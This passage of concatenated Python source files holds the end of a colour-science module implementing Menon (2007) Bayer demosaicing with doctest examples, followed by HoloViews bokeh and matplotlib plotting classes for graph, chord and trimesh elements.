'demosaicing_CFA_Bayer_Menon2007', 'demosaicing_CFA_Bayer_DDFAPD',
'refining_step_Menon2007'
]
def _cnv_h(x, y):
"""
Helper function for horizontal convolution.
"""
return convolve1d(x, y, mode='mirror')
def _cnv_v(x, y):
"""
Helper function for vertical convolution.
"""
return convolve1d(x, y, mode='mirror', axis=0)
def demosaicing_CFA_Bayer_Menon2007(CFA, pattern='RGGB', refining_step=True):
"""
Returns the demosaiced *RGB* colourspace array from given *Bayer* CFA using
DDFAPD - *Menon (2007)* demosaicing algorithm.
Parameters
----------
CFA : array_like
*Bayer* CFA.
pattern : unicode, optional
**{'RGGB', 'BGGR', 'GRBG', 'GBRG'}**,
Arrangement of the colour filters on the pixel array.
refining_step : bool
Perform refining step.
Returns
-------
ndarray
*RGB* colourspace array.
Notes
-----
- The definition output is not clipped in range [0, 1] : this allows for
direct HDRI / radiance image generation on *Bayer* CFA data and post
demosaicing of the high dynamic range data as showcased in this
`Jupyter Notebook <https://github.com/colour-science/colour-hdri/\
blob/develop/colour_hdri/examples/\
examples_merge_from_raw_files_with_post_demosaicing.ipynb>`_.
References
----------
:cite:`Menon2007c`
Examples
--------
>>> CFA = np.array(
... [[ 0.30980393, 0.36078432, 0.30588236, 0.3764706 ],
... [ 0.35686275, 0.39607844, 0.36078432, 0.40000001]])
>>> demosaicing_CFA_Bayer_Menon2007(CFA)
array([[[ 0.30980393, 0.35686275, 0.39215687],
[ 0.30980393, 0.36078432, 0.39607844],
[ 0.30588236, 0.36078432, 0.39019608],
[ 0.32156864, 0.3764706 , 0.40000001]],
<BLANKLINE>
[[ 0.30980393, 0.35686275, 0.39215687],
[ 0.30980393, 0.36078432, 0.39607844],
[ 0.30588236, 0.36078432, 0.39019609],
[ 0.32156864, 0.3764706 , 0.40000001]]])
>>> CFA = np.array(
... [[ 0.3764706 , 0.36078432, 0.40784314, 0.3764706 ],
... [ 0.35686275, 0.30980393, 0.36078432, 0.29803923]])
>>> demosaicing_CFA_Bayer_Menon2007(CFA, 'BGGR')
array([[[ 0.30588236, 0.35686275, 0.3764706 ],
[ 0.30980393, 0.36078432, 0.39411766],
[ 0.29607844, 0.36078432, 0.40784314],
[ 0.29803923, 0.3764706 , 0.42352942]],
<BLANKLINE>
[[ 0.30588236, 0.35686275, 0.3764706 ],
[ 0.30980393, 0.36078432, 0.39411766],
[ 0.29607844, 0.36078432, 0.40784314],
[ 0.29803923, 0.3764706 , 0.42352942]]])
"""
CFA = as_float_array(CFA)
R_m, G_m, B_m = masks_CFA_Bayer(CFA.shape, pattern)
h_0 = np.array([0, 0.5, 0, 0.5, 0])
h_1 = np.array([-0.25, 0, 0.5, 0, -0.25])
R = CFA * R_m
G = CFA * G_m
B = CFA * B_m
G_H = np.where(G_m == 0, _cnv_h(CFA, h_0) + _cnv_h(CFA, h_1), G)
G_V = np.where(G_m == 0, _cnv_v(CFA, h_0) + _cnv_v(CFA, h_1), G)
C_H = np.where(R_m == 1, R - G_H, 0)
C_H = np.where(B_m == 1, B - G_H, C_H)
C_V = np.where(R_m == 1, R - G_V, 0)
C_V = np.where(B_m == 1, B - G_V, C_V)
D_H = np.abs(C_H - np.pad(C_H, ((0, 0),
(0, 2)), mode=str('reflect'))[:, 2:])
D_V = np.abs(C_V - np.pad(C_V, ((0, 2),
(0, 0)), mode=str('reflect'))[2:, :])
del h_0, h_1, CFA, C_V, C_H
k = np.array(
[[0, 0, 1, 0, 1],
[0, 0, 0, 1, 0],
[0, 0, 3, 0, 3],
[0, 0, 0, 1, 0],
[0, 0, 1, 0, 1]]) # yapf: disable
d_H = convolve(D_H, k, mode='constant')
d_V = convolve(D_V, np.transpose(k), mode='constant')
del D_H, D_V
mask = d_V >= d_H
G = np.where(mask, G_H, G_V)
M = np.where(mask, 1, 0)
del d_H, d_V, G_H, G_V
# Red rows.
R_r = np.transpose(np.any(R_m == 1, axis=1)[np.newaxis]) * np.ones(R.shape)
# Blue rows.
B_r = np.transpose(np.any(B_m == 1, axis=1)[np.newaxis]) * np.ones(B.shape)
k_b = np.array([0.5, 0, 0.5])
R = np.where(
np.logical_and(G_m == 1, R_r == 1),
G + _cnv_h(R, k_b) - _cnv_h(G, k_b),
R,
)
R = np.where(
np.logical_and(G_m == 1, B_r == 1) == 1,
G + _cnv_v(R, k_b) - _cnv_v(G, k_b),
R,
)
B = np.where(
np.logical_and(G_m == 1, B_r == 1),
G + _cnv_h(B, k_b) - _cnv_h(G, k_b),
B,
)
B = np.where(
np.logical_and(G_m == 1, R_r == 1) == 1,
G + _cnv_v(B, k_b) - _cnv_v(G, k_b),
B,
)
R = np.where(
np.logical_and(B_r == 1, B_m == 1),
np.where(
M == 1,
B + _cnv_h(R, k_b) - _cnv_h(B, k_b),
B + _cnv_v(R, k_b) - _cnv_v(B, k_b),
),
R,
)
B = np.where(
np.logical_and(R_r == 1, R_m == 1),
np.where(
M == 1,
R + _cnv_h(B, k_b) - _cnv_h(R, k_b),
R + _cnv_v(B, k_b) - _cnv_v(R, k_b),
),
B,
)
RGB = tstack([R, G, B])
del R, G, B, k_b, R_r, B_r
if refining_step:
RGB = refining_step_Menon2007(RGB, tstack([R_m, G_m, B_m]), M)
del M, R_m, G_m, B_m
return RGB
demosaicing_CFA_Bayer_DDFAPD = demosaicing_CFA_Bayer_Menon2007
def refining_step_Menon2007(RGB, RGB_m, M):
"""
Performs the refining step on given *RGB* colourspace array.
Parameters
----------
RGB : array_like
*RGB* colourspace array.
RGB_m : array_like
*Bayer* CFA red, green and blue masks.
M : array_like
Estimation for the best directional reconstruction.
Returns
-------
ndarray
Refined *RGB* colourspace array.
Examples
--------
>>> RGB = np.array(
... [[[0.30588236, 0.35686275, 0.3764706],
... [0.30980393, 0.36078432, 0.39411766],
... [0.29607844, 0.36078432, 0.40784314],
... [0.29803923, 0.37647060, 0.42352942]],
... [[0.30588236, 0.35686275, 0.3764706],
... [0.30980393, 0.36078432, 0.39411766],
... [0.29607844, 0.36078432, 0.40784314],
... [0.29803923, 0.37647060, 0.42352942]]])
>>> RGB_m = np.array(
... [[[0, 0, 1],
... [0, 1, 0],
... [0, 0, 1],
... [0, 1, 0]],
... [[0, 1, 0],
... [1, 0, 0],
... [0, 1, 0],
... [1, 0, 0]]])
>>> M = np.array(
... [[0, 1, 0, 1],
... [1, 0, 1, 0]])
>>> refining_step_Menon2007(RGB, RGB_m, M)
array([[[ 0.30588236, 0.35686275, 0.3764706 ],
[ 0.30980393, 0.36078432, 0.39411765],
[ 0.29607844, 0.36078432, 0.40784314],
[ 0.29803923, 0.3764706 , 0.42352942]],
<BLANKLINE>
[[ 0.30588236, 0.35686275, 0.3764706 ],
[ 0.30980393, 0.36078432, 0.39411766],
[ 0.29607844, 0.36078432, 0.40784314],
[ 0.29803923, 0.3764706 , 0.42352942]]])
"""
R, G, B = tsplit(RGB)
R_m, G_m, B_m = tsplit(RGB_m)
M = as_float_array(M)
del RGB, RGB_m
# Updating of the green component.
R_G = R - G
B_G = B - G
FIR = np.ones(3) / 3
B_G_m = np.where(
B_m == 1,
np.where(M == 1, _cnv_h(B_G, FIR), _cnv_v(B_G, FIR)),
0,
)
R_G_m = np.where(
R_m == 1,
np.where(M == 1, _cnv_h(R_G, FIR), _cnv_v(R_G, FIR)),
0,
)
del B_G, R_G
G = np.where(R_m == 1, R - R_G_m, G)
G = np.where(B_m == 1, B - B_G_m, G)
# Updating of the red and blue components in the green locations.
# Red rows.
R_r = np.transpose(np.any(R_m == 1, axis=1)[np.newaxis]) * np.ones(R.shape)
# Red columns.
R_c = np.any(R_m == 1, axis=0)[np.newaxis] * np.ones(R.shape)
# Blue rows.
B_r = np.transpose(np.any(B_m == 1, axis=1)[np.newaxis]) * np.ones(B.shape)
# Blue columns.
B_c = np.any(B_m == 1, axis=0)[np.newaxis] * np.ones(B.shape)
R_G = R - G
B_G = B - G
k_b = np.array([0.5, 0, 0.5])
R_G_m = np.where(
np.logical_and(G_m == 1, B_r == 1),
_cnv_v(R_G, k_b),
R_G_m,
)
R = np.where(np.logical_and(G_m == 1, B_r == 1), G + R_G_m, R)
R_G_m = np.where(
np.logical_and(G_m == 1, B_c == 1),
_cnv_h(R_G, k_b),
R_G_m,
)
R = np.where(np.logical_and(G_m == 1, B_c == 1), G + R_G_m, R)
del B_r, R_G_m, B_c, R_G
B_G_m = np.where(
np.logical_and(G_m == 1, R_r == 1),
_cnv_v(B_G, k_b),
B_G_m,
)
B = np.where(np.logical_and(G_m == 1, R_r == 1), G + B_G_m, B)
B_G_m = np.where(
np.logical_and(G_m == 1, R_c == 1),
_cnv_h(B_G, k_b),
B_G_m,
)
B = np.where(np.logical_and(G_m == 1, R_c == 1), G + B_G_m, B)
del B_G_m, R_r, R_c, G_m, B_G
# Updating of the red (blue) component in the blue (red) locations.
R_B = R - B
R_B_m = np.where(
B_m == 1,
np.where(M == 1, _cnv_h(R_B, FIR), _cnv_v(R_B, FIR)),
0,
)
R = np.where(B_m == 1, B + R_B_m, R)
R_B_m = np.where(
R_m == 1,
np.where(M == 1, _cnv_h(R_B, FIR), _cnv_v(R_B, FIR)),
0,
)
B = np.where(R_m == 1, R - R_B_m, B)
del R_B, R_B_m, R_m
return tstack([R, G, B])
```
|
{
"source": "jewfro-cuban/holoviews",
"score": 2
}
|
#### File: plotting/bokeh/graphs.py
```python
from collections import defaultdict
import param
import numpy as np
from bokeh.models import (StaticLayoutProvider, NodesAndLinkedEdges,
EdgesAndLinkedNodes, Patches, Bezier, ColumnDataSource)
from ...core.data import Dataset
from ...core.util import (basestring, dimension_sanitizer, unique_array,
max_range)
from ...core.options import Cycle
from .chart import ColorbarPlot, PointPlot
from .element import (CompositeElementPlot, LegendPlot, line_properties,
fill_properties, text_properties)
from ..util import process_cmap
from .util import rgba_tuple
class GraphPlot(CompositeElementPlot, ColorbarPlot, LegendPlot):
color_index = param.ClassSelector(default=None, class_=(basestring, int),
allow_None=True, doc="""
Index of the dimension from which the color will the drawn""")
edge_color_index = param.ClassSelector(default=None, class_=(basestring, int),
allow_None=True, doc="""
Index of the dimension from which the color will the drawn""")
selection_policy = param.ObjectSelector(default='nodes', objects=['edges', 'nodes', None], doc="""
Determines policy for inspection of graph components, i.e. whether to highlight
nodes or edges when selecting connected edges and nodes respectively.""")
inspection_policy = param.ObjectSelector(default='nodes', objects=['edges', 'nodes', None], doc="""
Determines policy for inspection of graph components, i.e. whether to highlight
nodes or edges when hovering over connected edges and nodes respectively.""")
tools = param.List(default=['hover', 'tap'], doc="""
A list of plugin tools to use on the plot.""")
# Map each glyph to a style group
_style_groups = {'scatter': 'node', 'multi_line': 'edge', 'patches': 'edge', 'bezier': 'edge'}
style_opts = (['edge_'+p for p in fill_properties+line_properties] +
['node_'+p for p in fill_properties+line_properties] +
['node_size', 'cmap', 'edge_cmap'])
# Filled is only supported for subclasses
filled = False
# Bezier paths
bezier = False
# Declares which columns in the data refer to node indices
_node_columns = [0, 1]
@property
def edge_glyph(self):
if self.filled:
return 'patches_1'
elif self.bezier:
return 'bezier_1'
else:
return 'multi_line_1'
def _hover_opts(self, element):
if self.inspection_policy == 'nodes':
dims = element.nodes.dimensions()
dims = [(dims[2].pprint_label, '@{index_hover}')]+dims[3:]
elif self.inspection_policy == 'edges':
kdims = [(kd.pprint_label, '@{%s_values}' % kd)
if kd in ('start', 'end') else kd for kd in element.kdims]
dims = kdims+element.vdims
else:
dims = []
return dims, {}
def get_extents(self, element, ranges, range_type='combined'):
return super(GraphPlot, self).get_extents(element.nodes, ranges, range_type)
def _get_axis_labels(self, *args, **kwargs):
"""
Override axis labels to group all key dimensions together.
"""
element = self.current_frame
xlabel, ylabel = [kd.pprint_label for kd in element.nodes.kdims[:2]]
return xlabel, ylabel, None
def _get_edge_colors(self, element, ranges, edge_data, edge_mapping, style):
cdim = element.get_dimension(self.edge_color_index)
if not cdim:
return
elstyle = self.lookup_options(element, 'style')
cycle = elstyle.kwargs.get('edge_color')
idx = element.get_dimension_index(cdim)
field = dimension_sanitizer(cdim.name)
cvals = element.dimension_values(cdim)
if idx in self._node_columns:
factors = element.nodes.dimension_values(2, expanded=False)
elif idx == 2 and cvals.dtype.kind in 'uif':
factors = None
else:
factors = unique_array(cvals)
default_cmap = 'viridis' if factors is None else 'tab20'
cmap = style.get('edge_cmap', style.get('cmap', default_cmap))
nan_colors = {k: rgba_tuple(v) for k, v in self.clipping_colors.items()}
if factors is None or (factors.dtype.kind in 'uif' and idx not in self._node_columns):
colors, factors = None, None
else:
if factors.dtype.kind == 'f':
cvals = cvals.astype(np.int32)
factors = factors.astype(np.int32)
if factors.dtype.kind not in 'SU':
field += '_str__'
cvals = [str(f) for f in cvals]
factors = (str(f) for f in factors)
factors = list(factors)
if isinstance(cmap, dict):
colors = [cmap.get(f, nan_colors.get('NaN', self._default_nan)) for f in factors]
else:
colors = process_cmap(cycle or cmap, len(factors))
if field not in edge_data:
edge_data[field] = cvals
edge_style = dict(style, cmap=cmap)
mapper = self._get_colormapper(cdim, element, ranges, edge_style,
factors, colors, 'edge_colormapper')
transform = {'field': field, 'transform': mapper}
color_type = 'fill_color' if self.filled else 'line_color'
edge_mapping['edge_'+color_type] = transform
edge_mapping['edge_nonselection_'+color_type] = transform
edge_mapping['edge_selection_'+color_type] = transform
def _get_edge_paths(self, element):
path_data, mapping = {}, {}
xidx, yidx = (1, 0) if self.invert_axes else (0, 1)
if element._edgepaths is not None:
edges = element._split_edgepaths.split(datatype='array', dimensions=element.edgepaths.kdims)
if len(edges) == len(element):
path_data['xs'] = [path[:, xidx] for path in edges]
path_data['ys'] = [path[:, yidx] for path in edges]
mapping = {'xs': 'xs', 'ys': 'ys'}
else:
raise ValueError("Edge paths do not match the number of supplied edges."
"Expected %d, found %d paths." % (len(element), len(edges)))
return path_data, mapping
def get_data(self, element, ranges, style):
# Force static source to False
static = self.static_source
self.handles['static_source'] = static
self.static_source = False
# Get node data
nodes = element.nodes.dimension_values(2)
node_positions = element.nodes.array([0, 1])
# Map node indices to integers
if nodes.dtype.kind not in 'uif':
node_indices = {v: i for i, v in enumerate(nodes)}
index = np.array([node_indices[n] for n in nodes], dtype=np.int32)
layout = {str(node_indices[k]): (y, x) if self.invert_axes else (x, y)
for k, (x, y) in zip(nodes, node_positions)}
else:
index = nodes.astype(np.int32)
layout = {str(k): (y, x) if self.invert_axes else (x, y)
for k, (x, y) in zip(index, node_positions)}
point_data = {'index': index}
cycle = self.lookup_options(element, 'style').kwargs.get('node_color')
if isinstance(cycle, Cycle):
style.pop('node_color', None)
colors = cycle
else:
colors = None
cdata, cmapping = self._get_color_data(
element.nodes, ranges, style, name='node_fill_color',
colors=colors, int_categories=True
)
point_data.update(cdata)
point_mapping = cmapping
if 'node_fill_color' in point_mapping:
style = {k: v for k, v in style.items() if k not in
['node_fill_color', 'node_nonselection_fill_color']}
point_mapping['node_nonselection_fill_color'] = point_mapping['node_fill_color']
edge_mapping = {}
nan_node = index.max()+1 if len(index) else 0
start, end = (element.dimension_values(i) for i in range(2))
if nodes.dtype.kind == 'f':
start, end = start.astype(np.int32), end.astype(np.int32)
elif nodes.dtype.kind != 'i':
start = np.array([node_indices.get(x, nan_node) for x in start], dtype=np.int32)
end = np.array([node_indices.get(y, nan_node) for y in end], dtype=np.int32)
path_data = dict(start=start, end=end)
self._get_edge_colors(element, ranges, path_data, edge_mapping, style)
if not static:
pdata, pmapping = self._get_edge_paths(element)
path_data.update(pdata)
edge_mapping.update(pmapping)
# Get hover data
if 'hover' in self.handles:
if self.inspection_policy == 'nodes':
index_dim = element.nodes.get_dimension(2)
point_data['index_hover'] = [index_dim.pprint_value(v) for v in element.nodes.dimension_values(2)]
for d in element.nodes.dimensions()[3:]:
point_data[dimension_sanitizer(d.name)] = element.nodes.dimension_values(d)
elif self.inspection_policy == 'edges':
for d in element.dimensions():
dim_name = dimension_sanitizer(d.name)
if dim_name in ('start', 'end'):
dim_name += '_values'
path_data[dim_name] = element.dimension_values(d)
data = {'scatter_1': point_data, self.edge_glyph: path_data, 'layout': layout}
mapping = {'scatter_1': point_mapping, self.edge_glyph: edge_mapping}
return data, mapping, style
def _update_datasource(self, source, data):
"""
Update datasource with data for a new frame.
"""
if isinstance(source, ColumnDataSource):
if self.handles['static_source']:
source.trigger('data')
else:
source.data.update(data)
else:
source.graph_layout = data
def _init_glyphs(self, plot, element, ranges, source):
# Get data and initialize data source
style = self.style[self.cyclic_index]
data, mapping, style = self.get_data(element, ranges, style)
edge_mapping = {k: v for k, v in mapping[self.edge_glyph].items()
if 'color' not in k}
self.handles['previous_id'] = element._plot_id
properties = {}
mappings = {}
for key in list(mapping):
if not any(glyph in key for glyph in ('scatter_1', self.edge_glyph)):
continue
source = self._init_datasource(data.pop(key, {}))
self.handles[key+'_source'] = source
glyph_props = self._glyph_properties(plot, element, source, ranges, style)
properties.update(glyph_props)
mappings.update(mapping.pop(key, {}))
properties = {p: v for p, v in properties.items() if p not in ('legend', 'source')}
properties.update(mappings)
layout = data.pop('layout', {})
if data and mapping:
CompositeElementPlot._init_glyphs(self, plot, element, ranges, source,
data, mapping, style)
# Define static layout
layout = StaticLayoutProvider(graph_layout=layout)
node_source = self.handles['scatter_1_source']
edge_source = self.handles[self.edge_glyph+'_source']
renderer = plot.graph(node_source, edge_source, layout, **properties)
# Initialize GraphRenderer
if self.selection_policy == 'nodes':
renderer.selection_policy = NodesAndLinkedEdges()
elif self.selection_policy == 'edges':
renderer.selection_policy = EdgesAndLinkedNodes()
else:
renderer.selection_policy = None
if self.inspection_policy == 'nodes':
renderer.inspection_policy = NodesAndLinkedEdges()
elif self.inspection_policy == 'edges':
renderer.inspection_policy = EdgesAndLinkedNodes()
else:
renderer.inspection_policy = None
self.handles['layout_source'] = layout
self.handles['glyph_renderer'] = renderer
self.handles['scatter_1_glyph_renderer'] = renderer.node_renderer
self.handles[self.edge_glyph+'_glyph_renderer'] = renderer.edge_renderer
self.handles['scatter_1_glyph'] = renderer.node_renderer.glyph
if self.filled or self.bezier:
glyph_model = Patches if self.filled else Bezier
allowed_properties = glyph_model.properties()
for glyph_type in ('', 'selection_', 'nonselection_', 'hover_', 'muted_'):
glyph = getattr(renderer.edge_renderer, glyph_type+'glyph', None)
if glyph is None:
continue
props = self._process_properties(self.edge_glyph, properties, mappings)
filtered = self._filter_properties(props, glyph_type, allowed_properties)
new_glyph = glyph_model(**dict(filtered, **edge_mapping))
setattr(renderer.edge_renderer, glyph_type+'glyph', new_glyph)
self.handles[self.edge_glyph+'_glyph'] = renderer.edge_renderer.glyph
if 'hover' in self.handles:
if self.handles['hover'].renderers == 'auto':
self.handles['hover'].renderers = []
self.handles['hover'].renderers.append(renderer)
class ChordPlot(GraphPlot):
label_index = param.ClassSelector(default=None, class_=(basestring, int),
allow_None=True, doc="""
Index of the dimension from which the node labels will be drawn""")
show_frame = param.Boolean(default=False, doc="""
Whether or not to show a complete frame around the plot.""")
# Map each glyph to a style group
_style_groups = {'scatter': 'node', 'multi_line': 'edge', 'text': 'label',
'arc': 'arc'}
style_opts = (GraphPlot.style_opts + ['label_'+p for p in text_properties])
_draw_order = ['scatter', 'multi_line', 'layout']
def get_extents(self, element, ranges, range_type='combined'):
"""
A Chord plot is always drawn on a unit circle.
"""
xdim, ydim = element.nodes.kdims[:2]
if range_type not in ('combined', 'data', 'extents'):
return xdim.range[0], ydim.range[0], xdim.range[1], ydim.range[1]
rng = 1.1 if element.nodes.get_dimension(self.label_index) is None else 1.4
x0, x1 = max_range([xdim.range, (-rng, rng)])
y0, y1 = max_range([ydim.range, (-rng, rng)])
return (x0, y0, x1, y1)
def get_data(self, element, ranges, style):
offset = style.pop('label_offset', 1.05)
data, mapping, style = super(ChordPlot, self).get_data(element, ranges, style)
if 'node_fill_color' in mapping['scatter_1']:
angles = element._angles
arcs = defaultdict(list)
for i in range(len(element.nodes)):
start, end = angles[i:i+2]
vals = np.linspace(start, end, 20)
xs, ys = np.cos(vals), np.sin(vals)
arcs['arc_xs'].append(xs)
arcs['arc_ys'].append(ys)
data['scatter_1'].update(arcs)
data['multi_line_2'] = data['scatter_1']
mapping['multi_line_2'] = {'xs': 'arc_xs', 'ys': 'arc_ys', 'line_width': 10}
mapping['multi_line_2']['line_color'] = mapping['scatter_1']['node_fill_color']
mapping['multi_line_2']['nonselection_line_color'] = mapping['scatter_1']['node_fill_color']
mapping['multi_line_2']['selection_line_color'] = mapping['scatter_1']['node_fill_color']
lidx = element.nodes.get_dimension(self.label_index)
if lidx is None:
if self.label_index is not None:
dims = element.nodes.dimensions()[2:]
self.warning("label_index supplied to Chord not found, "
"expected one of %s, got %s." %
(dims, self.label_index))
return data, mapping, style
nodes = element.nodes
if element.vdims:
values = element.dimension_values(element.vdims[0])
if values.dtype.kind in 'uif':
edges = Dataset(element)[values>0]
nodes = list(np.unique([edges.dimension_values(i) for i in range(2)]))
nodes = element.nodes.select(**{element.nodes.kdims[2].name: nodes})
xs, ys = (nodes.dimension_values(i)*offset for i in range(2))
labels = [lidx.pprint_value(v) for v in nodes.dimension_values(lidx)]
angles = np.arctan2(ys, xs)
data['text_1'] = dict(x=xs, y=ys, text=[str(l) for l in labels], angle=angles)
mapping['text_1'] = dict(text='text', x='x', y='y', angle='angle', text_baseline='middle')
return data, mapping, style
class NodePlot(PointPlot):
"""
Simple subclass of PointPlot which hides x, y position on hover.
"""
def _hover_opts(self, element):
return element.dimensions()[2:], {}
class TriMeshPlot(GraphPlot):
filled = param.Boolean(default=False, doc="""
Whether the triangles should be drawn as filled.""")
style_opts = (['edge_'+p for p in line_properties+fill_properties] +
['node_'+p for p in fill_properties+line_properties] +
['node_size', 'cmap', 'edge_cmap'])
# Declares that three columns in TriMesh refer to edges
_node_columns = [0, 1, 2]
def get_data(self, element, ranges, style):
# Ensure the edgepaths for the triangles are generated before plotting
simplex_dim = element.get_dimension(self.edge_color_index)
vertex_dim = element.nodes.get_dimension(self.edge_color_index)
if not isinstance(self.edge_color_index, int) and vertex_dim and not simplex_dim:
simplices = element.array([0, 1, 2])
z = element.nodes.dimension_values(vertex_dim)
z = z[simplices].mean(axis=1)
element = element.add_dimension(vertex_dim, len(element.vdims), z, vdim=True)
element.edgepaths
return super(TriMeshPlot, self).get_data(element, ranges, style)
```
#### File: plotting/mpl/graphs.py
```python
import param
import numpy as np
from matplotlib.collections import LineCollection, PolyCollection
from ...core.data import Dataset
from ...core.options import Cycle
from ...core.util import basestring, unique_array, search_indices, max_range
from ..util import process_cmap
from .element import ColorbarPlot
class GraphPlot(ColorbarPlot):
color_index = param.ClassSelector(default=None, class_=(basestring, int),
allow_None=True, doc="""
Index of the dimension from which the color will the drawn""")
edge_color_index = param.ClassSelector(default=None, class_=(basestring, int),
allow_None=True, doc="""
Index of the dimension from which the color will the drawn""")
style_opts = ['edge_alpha', 'edge_color', 'edge_linestyle', 'edge_linewidth',
'node_alpha', 'node_color', 'node_edgecolors', 'node_facecolors',
'node_linewidth', 'node_marker', 'node_size', 'visible', 'cmap',
'edge_cmap']
_style_groups = ['node', 'edge']
filled = False
def _compute_styles(self, element, ranges, style):
elstyle = self.lookup_options(element, 'style')
color = elstyle.kwargs.get('node_color')
cdim = element.nodes.get_dimension(self.color_index)
cmap = elstyle.kwargs.get('cmap', 'tab20')
if cdim:
cs = element.nodes.dimension_values(self.color_index)
# Check if numeric otherwise treat as categorical
if cs.dtype.kind == 'f':
style['c'] = cs
else:
factors = unique_array(cs)
cmap = color if isinstance(color, Cycle) else cmap
if isinstance(cmap, dict):
colors = [cmap.get(f, cmap.get('NaN', {'color': self._default_nan})['color'])
for f in factors]
else:
colors = process_cmap(cmap, len(factors))
cs = search_indices(cs, factors)
style['node_facecolors'] = [colors[v%len(colors)] for v in cs]
style.pop('node_color', None)
if 'c' in style:
self._norm_kwargs(element.nodes, ranges, style, cdim)
elif color:
style['c'] = style.pop('node_color')
style['node_edgecolors'] = style.pop('node_edgecolors', 'none')
edge_cdim = element.get_dimension(self.edge_color_index)
if not edge_cdim:
return style
elstyle = self.lookup_options(element, 'style')
cycle = elstyle.kwargs.get('edge_color')
idx = element.get_dimension_index(edge_cdim)
cvals = element.dimension_values(edge_cdim)
if idx in [0, 1]:
factors = element.nodes.dimension_values(2, expanded=False)
elif idx == 2 and cvals.dtype.kind in 'uif':
factors = None
else:
factors = unique_array(cvals)
if factors is None or (factors.dtype.kind == 'f' and idx not in [0, 1]):
style['edge_array'] = cvals
else:
cvals = search_indices(cvals, factors)
factors = list(factors)
cmap = elstyle.kwargs.get('edge_cmap', 'tab20')
cmap = cycle if isinstance(cycle, Cycle) else cmap
if isinstance(cmap, dict):
colors = [cmap.get(f, cmap.get('NaN', {'color': self._default_nan})['color'])
for f in factors]
else:
colors = process_cmap(cmap, len(factors))
style['edge_colors'] = [colors[v%len(colors)] for v in cvals]
style.pop('edge_color', None)
if 'edge_array' in style:
self._norm_kwargs(element, ranges, style, edge_cdim, 'edge_')
else:
style.pop('edge_cmap', None)
if 'edge_vmin' in style:
style['edge_clim'] = (style.pop('edge_vmin'), style.pop('edge_vmax'))
return style
def get_data(self, element, ranges, style):
xidx, yidx = (1, 0) if self.invert_axes else (0, 1)
pxs, pys = (element.nodes.dimension_values(i) for i in range(2))
dims = element.nodes.dimensions()
self._compute_styles(element, ranges, style)
paths = element._split_edgepaths.split(datatype='array', dimensions=element.edgepaths.kdims)
if self.invert_axes:
paths = [p[:, ::-1] for p in paths]
return {'nodes': (pxs, pys), 'edges': paths}, style, {'dimensions': dims}
def get_extents(self, element, ranges, range_type='combined'):
return super(GraphPlot, self).get_extents(element.nodes, ranges, range_type)
def init_artists(self, ax, plot_args, plot_kwargs):
# Draw edges
color_opts = ['c', 'cmap', 'vmin', 'vmax', 'norm']
groups = [g for g in self._style_groups if g != 'edge']
edge_opts = {k[5:] if 'edge_' in k else k: v
for k, v in plot_kwargs.items()
if not any(k.startswith(p) for p in groups)
and k not in color_opts}
paths = plot_args['edges']
if self.filled:
coll = PolyCollection
if 'colors' in edge_opts:
edge_opts['facecolors'] = edge_opts.pop('colors')
else:
coll = LineCollection
edges = coll(paths, **edge_opts)
ax.add_collection(edges)
# Draw nodes
xs, ys = plot_args['nodes']
groups = [g for g in self._style_groups if g != 'node']
node_opts = {k[5:] if 'node_' in k else k: v
for k, v in plot_kwargs.items()
if not any(k.startswith(p) for p in groups)}
if 'size' in node_opts: node_opts['s'] = node_opts.pop('size')**2
nodes = ax.scatter(xs, ys, **node_opts)
return {'nodes': nodes, 'edges': edges}
def _update_nodes(self, element, data, style):
nodes = self.handles['nodes']
xs, ys = data['nodes']
nodes.set_offsets(np.column_stack([xs, ys]))
cdim = element.nodes.get_dimension(self.color_index)
if cdim and 'c' in style:
nodes.set_clim((style['vmin'], style['vmax']))
nodes.set_array(style['c'])
if 'norm' in style:
nodes.norm = style['norm']
def _update_edges(self, element, data, style):
edges = self.handles['edges']
paths = data['edges']
edges.set_paths(paths)
edges.set_visible(style.get('visible', True))
cdim = element.get_dimension(self.edge_color_index)
if cdim:
if 'edge_array' in style:
edges.set_clim(style['edge_clim'])
edges.set_array(style['edge_array'])
if 'norm' in style:
edges.norm = style['edge_norm']
elif 'edge_colors' in style:
if self.filled:
edges.set_facecolors(style['edge_colors'])
else:
edges.set_edgecolors(style['edge_colors'])
def update_handles(self, key, axis, element, ranges, style):
data, style, axis_kwargs = self.get_data(element, ranges, style)
self._update_nodes(element, data, style)
self._update_edges(element, data, style)
return axis_kwargs
class TriMeshPlot(GraphPlot):
filled = param.Boolean(default=False, doc="""
Whether the triangles should be drawn as filled.""")
style_opts = GraphPlot.style_opts + ['edge_facecolors']
def get_data(self, element, ranges, style):
simplex_dim = element.get_dimension(self.edge_color_index)
vertex_dim = element.nodes.get_dimension(self.edge_color_index)
if not isinstance(self.edge_color_index, int) and vertex_dim and not simplex_dim:
simplices = element.array([0, 1, 2])
z = element.nodes.dimension_values(vertex_dim)
z = z[simplices].mean(axis=1)
element = element.add_dimension(vertex_dim, len(element.vdims), z, vdim=True)
# Ensure the edgepaths for the triangles are generated before plotting
element.edgepaths
return super(TriMeshPlot, self).get_data(element, ranges, style)
class ChordPlot(GraphPlot):
label_index = param.ClassSelector(default=None, class_=(basestring, int),
allow_None=True, doc="""
Index of the dimension from which the node labels will be drawn""")
style_opts = GraphPlot.style_opts + ['text_font_size', 'label_offset']
_style_groups = ['edge', 'node', 'arc']
def get_extents(self, element, ranges, range_type='combined'):
"""
A Chord plot is always drawn on a unit circle.
"""
xdim, ydim = element.nodes.kdims[:2]
if range_type not in ('combined', 'data'):
return xdim.range[0], ydim.range[0], xdim.range[1], ydim.range[1]
rng = 1.1 if element.nodes.get_dimension(self.label_index) is None else 1.4
x0, x1 = max_range([xdim.range, (-rng, rng)])
y0, y1 = max_range([ydim.range, (-rng, rng)])
return (x0, y0, x1, y1)
def get_data(self, element, ranges, style):
data, style, plot_kwargs = super(ChordPlot, self).get_data(element, ranges, style)
if isinstance(style.get('node_facecolors'), list):
angles = element._angles
paths = []
for i in range(len(element.nodes)):
start, end = angles[i:i+2]
vals = np.linspace(start, end, 20)
paths.append(np.column_stack([np.cos(vals), np.sin(vals)]))
data['arcs'] = paths
style['arc_colors'] = style['node_facecolors']
style['arc_linewidth'] = 10
lidx = element.nodes.get_dimension(self.label_index)
if lidx is None:
if self.label_index is not None:
dims = element.nodes.dimensions()[2:]
self.warning("label_index supplied to Chord not found, "
"expected one of %s, got %s." %
(dims, self.label_index))
return data, style, plot_kwargs
nodes = element.nodes
if element.vdims:
values = element.dimension_values(element.vdims[0])
if values.dtype.kind in 'uif':
edges = Dataset(element)[values>0]
nodes = list(np.unique([edges.dimension_values(i) for i in range(2)]))
